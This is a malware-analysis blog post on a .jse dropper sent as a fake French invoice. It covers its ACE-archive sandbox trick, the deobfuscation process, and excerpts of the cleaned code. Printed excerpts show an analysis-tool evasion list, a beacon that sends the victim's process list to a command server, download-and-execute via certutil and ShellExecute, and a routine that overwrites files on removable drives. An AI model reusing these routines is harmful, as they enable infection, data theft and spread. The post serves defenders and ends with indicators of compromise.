lundi 30 octobre 2017

sandbox evasion for a .jse malware

1/ source email

I was sitting in front of my PC playing SoulCalibur. An IRC window popped up, with one of my friend saying:

"Hey, you should check this strange email I've received. I don't know what's in it, I'm not a customer of this company".

The mail was a classical email with the text: "you got an invoice, please check and pay" (sort of). The
attachment was 1&1.pdf.facture.rar (facture means invoice in french).

I quickly tell him that it was highly suspicious, that he must trash this mail, and I dig into it.

2/ Analysis

2/1/ First analysis

The file seems to have some interesting anti-sandbox techniques. Sandboxes are equipment placed in front of email server, dedicated to malware analysis. Your mail is sent through those big boxes, email attachments are extracted, unzipped, then sent to a windows VM in order to analyze what this file will
do to the computer. Thoses boxes are mainly linux boxes, which is a point to keep in mind.

The 1&1.pdf.facture.rar file has some interesting characteristics:

mitsurugi@dojo:~/chall/infected/kukushka$ file 1\&1.pdf.facture.rar 
1&1.pdf.facture.rar: ACE archive data version 20, from Win/32, version 20 to extract, contains AV-String (unregistered), with recovery record, solid
mitsurugi@dojo:~/chall/infected/kukushka$ # So it's an "ace" file
mitsurugi@dojo:~/chall/infected/kukushka$ mv 1\&1.pdf.facture.rar suspicious.ace
mitsurugi@dojo:~/chall/infected/kukushka$ ls -l suspicious.ace 
-rw-r--r-- 1 mitsurugi mitsurugi 102481 oct.  23 15:58 suspicious.ace
mitsurugi@dojo:~/chall/infected/kukushka$ unace l suspicious.ace 
UNACE v1.2    public version

Processing archive: suspicious.ace

Authenticity Verification:
created on 10.10.2017 by *UNREGISTERED VERSION*

Date    |Time |Packed     |Size     |Ratio|File

                         0|        0| 100%| 0 files

mitsurugi@dojo:~/chall/infected/kukushka$ 

This file contains ... nothing (?) It's obviously a false positive. My best guess is that the spammer wants to confuse sandboxes. If you don't have any file to analyze, sandbox couldn't tell if the file is infected :)



But one question remains, why the name of the file ends in .rar and not .ace? The .ace extension is not widely used under windows. Renaming it .rar can extends the availibilty of the spam campaign,
and yes, winrar under windows extracts the file too.
This is a really nice anti-sandbox trick :)

As you can guess, there is indeed something:

mitsurugi@dojo:~/chall/infected/kukushka$ strings suspicious.ace | head -5
**ACE**
*UNREGISTERED VERSION*
1&1.pdf.facture.jse,
*M4D
?p}q
mitsurugi@dojo:~/chall/infected/kukushka$

You have to boot a windows machine, download winace (or winrar) and unzip the file. Warning, a misclick could infect your machine.

Once extracted, you can see that the file is a .jse (javascript encoded file):

mitsurugi@dojo:~/chall/infected/kukushka/take2$ hexdump -C suspicious.jse | head
00000000  23 40 7e 5e 52 43 49 47  41 41 3d 3d 56 21 33 3b  |#@~^RCIGAA==V!3;|
00000010  6b 74 30 6c 6b 09 59 4b  31 59 7b 24 7b 47 2b 7e  |kt0lk.YK1Y{${G+~|
00000020  71 54 4f 54 69 30 3b 33  21 2f 74 30 43 32 6c 31  |qTOTi0;3!/t0C2l1|
00000030  33 6d 6f 6e 2c 71 4f 7b  24 7b 2c 52 53 2a 5a 25  |3mon,qO{${,RS*Z%|
00000040  44 49 30 45 33 3b 64 34  33 43 68 4b 3b 5e 4e 30  |DI0E3;d43ChK;^N0|
00000050  44 27 5d 76 76 79 7e 57  71 54 70 7f 6e 44 7f 59  |D']vvy~WqTp.nD.Y|
00000060  78 6a 44 44 6b 09 4c 24  72 2d 36 2b 7f 77 36 46  |xjDDk.L$r-6+.w6F|
00000070  20 27 36 7f 73 77 61 2b  66 77 36 57 66 2d 58 76  | '6.swa+fw6Wf-Xv|
00000080  30 77 58 76 46 77 61 46  20 77 36 57 66 27 36 7f  |0wXvFwaF w6Wf'6.|
00000090  77 2d 58 76 63 27 36 2b  58 4a 59 69 57 45 09 6d  |w-Xvc'6+XJYiWE.m|
mitsurugi@dojo:~/chall/infected/kukushka/take2$

This file can be extracted to a plain .js file thanks to a decoder:
https://gist.github.com/bcse/1834878

We have a long file, 400kb long without any carriage return.

mitsurugi@dojo:~/chall/infected/kukushka/take2$ wc suspicious.jse
     0   8881 402013 suspicious.jse
mitsurugi@dojo:~/chall/infected/kukushka/take2$

2/2/ desobfuscating js file

The file can be beautified with a site like jsbeautifier.org, and we can see that it's obfuscated:

kukushkainto9t = [776, 109];
kukushkapackage91t = [798, 508];
kukushkawould8t = [662, 41];
Weret = String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"];

function Pesen(a) {
    return a.length;
};
kukushkahelp13t = [885, 31];
kukushkabecome59t = [389, 210];
kukushkaonly52t = [570, 520];
kukushkaTeaching44t = [63, 64];
kukushkacome84t = [563, 237];
kukushkaknow23t = [83, 120];
kukushkaknowledge24t = [689, 726];
kukushkaacquired16t = [291, 172];
kukushkalifeNurturing10t = [695, 606];
kukushkateacher32t = [171, 621];
kukushkabooksDIRECTORDirectorate89t = [156, 498];
kukushkayes17t = [230, 612];
var kukushkaface35t = 0.708;
var kukushkasoft34 = this[(function hkai_7hk9() {
        kukushkaregards76t = 'Lake10';
        kukushkahave12t = 'about76';
        return Weret(64 ^ Pesen(arguments));
    })('holes94', 'that46', 'wife5', 'picking16', 'What99') + (..400kB long like this...)
It's time to deobfuscate. With 400kB, you can't do it by hand, you have
to automatize things. Find obfuscation patterns, remove them and iterate.

Main steps are:
a) renaming utf8 vars to ascii:
var\ u0073\ u0063\ u0072\ u0031\ u0070\ u0061\ u0074\ u0068 = kukushkavocabulary3to30[(function hkae_5hkaT4() {

This can be done automatically:
var scr1path = kukushakvaocabulary3to30 

b) calculating Weret, pesen and easy functions:

Weret is the function "fromCharCode"


Weret = String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"];

function Pesen(a) {
    return a.length;
};
(function hkai_7hk9() {
     kukushkaregards76t = 'Lake10';
     kukushkahave12t = 'about76';
     return Weret(64 ^ Pesen(arguments));
  })('holes94', 'that46', 'wife5', 'picking16', 'What99')

the first two vars are useless, the end is just length of arguments xored with a constant. In the end, this is fromCharCode(64 XOR 5) = 'E'

This structure comes really often, we can automatize it with regexp, extraction evaluation of js code and replacement.

c) Evaluating long vars
and we have a lot of var name and expression splitted in pieces:
var kukushkatoto42 = "E" + "r" + "r" + and so on..

This is not really hard to deobfuscate, just take times. It can be automatized.

d) repeat
We repeat all those simplifications with some python scripts.

e) simplification
Here is the stripped down version of the .js file

mitsurugi@dojo:~/chall/infected/kukushka/take2$ wc *js
   9947   49021  630068 simplified0.js
   9947   47780  621653 simplified1.js
   5584   26049  328812 simplified2.js
   3186   14345  185647 simplified3.js
   3081   13770  178223 simplified4.js
   3034   13566  176057 simplified5.js
   1331    6580   96156 simplified6.js
    457    3089   28791 simplified7.js
    457    2286   25936 simplified8.js
    435    2175   24069 simplified9.js
    322    1854   21089 simplified9-manual0.js
    286    1127   15156 simplified9-manual1.js
    307    1113   14922 simplified9-manual2.js
    280    1032   14040 simplified9-manual3.js
mitsurugi@dojo:~/chall/infected/kukushka/take2$

2/3/ cleaned up and disarmed

For reference, You can see in git a disarmed version of the js file. This js file doesn't do any harm. All risky things are commented out. There is also a zip file with every steps. (pass: infected, warning, this is malware)

3/ Program analysis

You can see the program as a big while(true) loop:

-Checks the location of .jse file
-While true loop
  Get process list, OS and username
  Check for some well known analysis tools (and exit if yes)
  Copy itself to startup folder
  -While true loop
    Connect to C&C
    Get file
    If WORM_MODE, then replace all file in removable drives byt iself
    Exec file downloaded previously

3/1/ startup

At start, the jse file checks if it was launched from the Start Menu\Programs\Startup\ folder and if it has the name adobe_upd.jse.

In any case, it throws a fake error message then continue (all comments are mine).

/* [+] JSEFILE is C:\Users\mitsurugi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe_upd.jse */
try {
    if (scr1path != JSEFILE) {
       objFile = FSObject["OpenTextFile"](scr1path, 1, false, 0);
       mybodyhere = objFile["ReadLine"]();
       objFile["Close"]();
       FILENAMEisBAD = true;
       if (SHOW_ERROR) ObjectWscriptShell["Popup"]("scr1path is not JSEFILE!!", 10, "Error", 16);
       if (FSObject["FileExists"](JSEFILE)) {
     /* In case user launch another time the file by double clicking on it?*/
           this.WScript["Quit"](1);
        }
    } else {}
} catch (WSdrFgyvb) {
    ObjectWscriptShell["Popup"]("A File Error has Occurred", 5, "Error", 16);
}

It makes the a huge iteration:

while (16) {             /* While True */
    gokolp0 = "low";     /* gokolp0 is never used elsewhere */
    Counter = Counter + 1;
    if (Counter == 2040000) {
      /* all malware code */
    }
}

Once again, it can be seen as an antidebug techniques. Some sandbox and antivirus checks the
file for a specific time. To avoid "Sleep()" function, they often hook the sleep's to
accelerate time. With a loop like this, there nothing you can hook to accelerate time.

3/2/ Get a lot of information from victim

The script uses wmi to grab all of information needed:

var obj00WMI = this.GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
var ProcessList = new this.Enumerator(obj00WMI["ExecQuery"]("Select * from Win32_Process"));
var Win32OSList = new this.Enumerator(obj00WMI["ExecQuery"]("Select * from Win32_OperatingSystem"));

It checks this list for exitingi (option9 == -1) (comments are my own):
 if (ProcessPathAndName["indexOf"]("Procmon") != option9 ||
     ProcessPathAndName["indexOf"]("Wireshark") != option9 ||
     ProcessPathAndName["indexOf"]("Temp\\iexplore.exe") != option9 ||
     ProcessPathAndName["indexOf"]("ProcessHacker") != option9 ||
     ProcessPathAndName["indexOf"]("vmtoolsd") != option9 ||
     ProcessPathAndName["indexOf"]("VBoxService") != option9 ||
     ProcessPathAndName["indexOf"]("python") != option9 ||
     ProcessPathAndName["indexOf"]("Proxifier.exe") != option9 ||
     ProcessPathAndName["indexOf"]("Johnson") != option9 ||
     ProcessPathAndName["indexOf"]("ImmunityDebugger.exe") != option9 ||
     ProcessPathAndName["indexOf"]("lordPE.exe") != option9 ||
     ProcessPathAndName["indexOf"]("ctfmon.exe*JOHN-PC") != option9 ||
     ProcessPathAndName["indexOf"]("BehaviorDumper") != option9 ||
     ProcessPathAndName["indexOf"]("antivirus.EXE") != option9 ||   /* ??? antivirus.EXE?? */
     ProcessPathAndName["indexOf"]("AgentSimulator.exe") != option9 ||
     ProcessPathAndName["indexOf"]("VzService.exe") != option9 ||
     ProcessPathAndName["indexOf"]("VBoxTray.exe") != option9 ||
     ProcessPathAndName["indexOf"]("VmRemoteGuest") != option9 ||
     ProcessPathAndName["indexOf"]("SystemIT|admin") != option9 ||
     ProcessPathAndName["indexOf"]("WIN7-TRAPS") != option9 ||
     ProcessPathAndName["indexOf"]("Emily\\AppData") != option9)  /*Who's Emily? */
     {
       reader["alert"]("Screw you guys, Im going home!!!!");
 /* "reader" (?) seems undefined */
       this.WScript["quit"](1);
     }

As you can guess, all of those process path and name are related to analyis environments

3/3/ Calling C&C

The C&C has the real address. It's obfuscated for the blogpost


url_ppp = "hxxps://185[.]159.82[.]50:9500/XA/mijagi.php?netuid=bugaga&add=2097d7b063d6f8b5cc803abf3df758aa";
url_ppp = url_ppp + "&u=" + Math["abs"](kukushkaships15) + "&o=" + kukushkatouches96 + "&v=" + icount + "&s=1994";
msxmlXMLHTTP["open"]("POST", url_ppp, false);
if (FILENAMEisBAD) {
  /* At first, Filename is bad because it is not in startup folder
  So we sent our name and list of processes */
  msxmlXMLHTTP["send"](ProcessPathAndName);
} else {
  /* This is the part when the jse is in the autostart folder */
  msxmlXMLHTTP["send"]();
}


  • The netuid and add parameter are hardcoded.
  • The kukushkaships15 depends of the length of the path of the jse file.
  • The o parameter depends of many things (0 at first, can be 9999, 45, 46, 47, or 9)
  • The v parameter is 10 or 20
  • The s parameter is Random


The interesting part is that it sends all of your data (Process list, OS version and name) to the C&C at the first loop iteration. Maybe the botmaster tracks stats of its emailing?

The feedback from the C&C is given through an HTTP-Header (!)

if (msxmlXMLHTTP["status"] == 200) {
if (kukushkatouches96 == 0) {
try {
  if (msxmlXMLHTTP["getResponseHeader"]("you_god_damn_right") == '0') {
  file1path = JSEFILE;
  option9 = 0;   /* discriminate based on the response */
}
} catch (WSdrFgyvb) {}

try {
  if (msxmlXMLHTTP["getResponseHeader"]("you_god_damn_right") == ("1")) {
  option9 = 1;   /* Guess it's the exe */
}
} catch (WSdrFgyvb) {}

try {
  if (msxmlXMLHTTP["getResponseHeader"]("you_god_damn_right") == ("2")) {
  option9 = 2;  /* Or the text to be passed to certutil */
}
} catch (WSdrFgyvb) {}

try {
if (msxmlXMLHTTP["getResponseHeader"]("Content-Transfer-Encoding") == "binary") {
  ADODBStream["Open"]();
  ADODBStream["Type"] = 1;
  ADODBStream["Write"](msxmlXMLHTTP["responseBody"]);
  ADODBStream["Position"] = 0;
  ADODBStream["SaveToFile"](file1path, 2);  /*file1path rnd name.exe */
  ADODBStream["Close"]();
} else {
if (CCresponseText.length > 10);
  objFile = FSObject["CreateTextFile"](TEMPFOLDER_file_mtm, true, false); /*mtm file */
  objFile["WriteLine"](CCresponseText);
  objFile["Close"]();
  this.WScript["Sleep"](5000);
  shellApp["ShellExecute"]("certutil", "-f -decode" + TEMPFOLDER_file.mtm + ("") + charq + file1path + charq, '', "open", 0);
}
}

We understand that server can send either a binary file (.exe) or a base64 one.

3/3/ Wormisation

This file has wormable capabilities. It search for any removable drives, and duplicate its .jse contents to any file ending in
var FileExtTargets ="*.doc*.xls*.pdf*.rtf*.txt*.pub*.odt*.ods*.odp*.odm*.odc*.odb*.wps*.xlk*.ppt*.mdb*.accdb*.pst*.dwg*.dxf*.dxg*.wpd";

The file content is wiped, replaced by the jse content, and file extension is replaced by .jse.

This is not really a stealthy way to propagate, but it can works.

3/4/ Code execution

Finally, the .jse tries to launches the exe file.
option9 is given by the server header.

switch (option9) {
case -1:
 shellApp["ShellExecute"]("cmd", "/c start " + file1path, '', "open", exit123);
 kukushkatouches96 = 45;
 break;
case 0:
 shellApp["ShellExecute"]("cmd", "/c start " + file1path, '', "open", exit123);
 kukushkatouches96 = 46;
 break;
case 1:
 shellApp["ShellExecute"]("rundll32", charq + file1path + charq + " secretFunction", '', "open", exit123);
 kukushkatouches96 = 47;
 break;
case 2:
 shellApp["ShellExecute"]("taskkill", "/f /t /im chrome.exe", '', "open", 0);\
 shellApp["ShellExecute"](file1path, "/silent /install", '', "runas", 1);
 kukushkatouches96 = 48;
 break;
}

So, the downloaded file seems to be a plain exe, a dll and an installer which must kill Chrome
before installing (?)

3/5/ Fun stuff

As usual in worms/malware, you can find funny strings:
reader["alert"]("Screw you guys, Im going home!!!!");
It can be a reference to South Park

When server sends data, there is an header:
if (msxmlXMLHTTP["getResponseHeader"]("you_god_damn_right") == ("2")) {
and the wormable part uses a temp filename called "saymyname"

It seems we have a fan of breaking bad here.

The obfuscation makes an heavy use of kukushka to prefix variable names. kukushka means cuckoo in russian. Don't know what to conclude here.

4/ Get the files

I've used my disarmed file to get the files, but didn't succeeded. At the time of writing this blog, the server doesn't respond anymore, so the campaign is finished I guess.
As this file makes a lot of antidebug techniques, I don't think you can easily get the files. All parameters depends on something, you have strict timers. Maybe server part checks everything and sends only file to specific targets. I used my disarmed js file instead of making some wget for those reason.

In Virustotal, you have the first occurence of the file the 10 of October, the viral detection beguns the 13:
https://www.virustotal.com/#/file/e5fcb6e3ecbd08e18445d04edb84384eadff13cd01e91b737fcc2f0fb1b4d10d/detection  (suspicious.ace file)

https://www.virustotal.com/#/file/224ad333eb3b27056b968c453ad007aa5a4a613730da767937c7c2511bf2b84f/detection  (suspicious jse file)

https://www.virustotal.com/#/ip-address/185.159.82.50
This one is interesting because someone tries to analyze https://185[.]159.82[.]50:9500/DA/mijagi.php?netuid=bugaga which is only a part of the requests made to the C&C. May be someone deobfuscating the .jse and who doesn't saw that there is more in parameteres

5/ IOCs

It seems pretty useless to block the IP.
Strangely, the header name you_god_damn_right seems more reliable. You can find other occurence of it in the googleweb:

https://community.spiceworks.com/topic/1954953-file-ext-changed-to-jse  (go to the end of the post)
Date: Sep 2 2017

https://www.hybrid-analysis.com/sample/9157e7ed6aa77da3575cbbc32e3c2c5fd7074e9ffe326b96b0cbefa897f8c581?environmentId=100
Date: August 2017

http://ddecode.com/hexdecoder/?results=bed2e8df3925d8712bb1d2ba55cb9063
(no date)

https://securite.intrinsec.com/2017/05/16/exercice-de-desobfuscation-dun-jse-par-le-cert-intrinsec/ (in french) in may 2107.

So, if you have an appliance in your network making SSL analysis, you could check if some HTTP servers sends an header 'you_god_damn_right' and block it. It can helps you without any risk of false positive.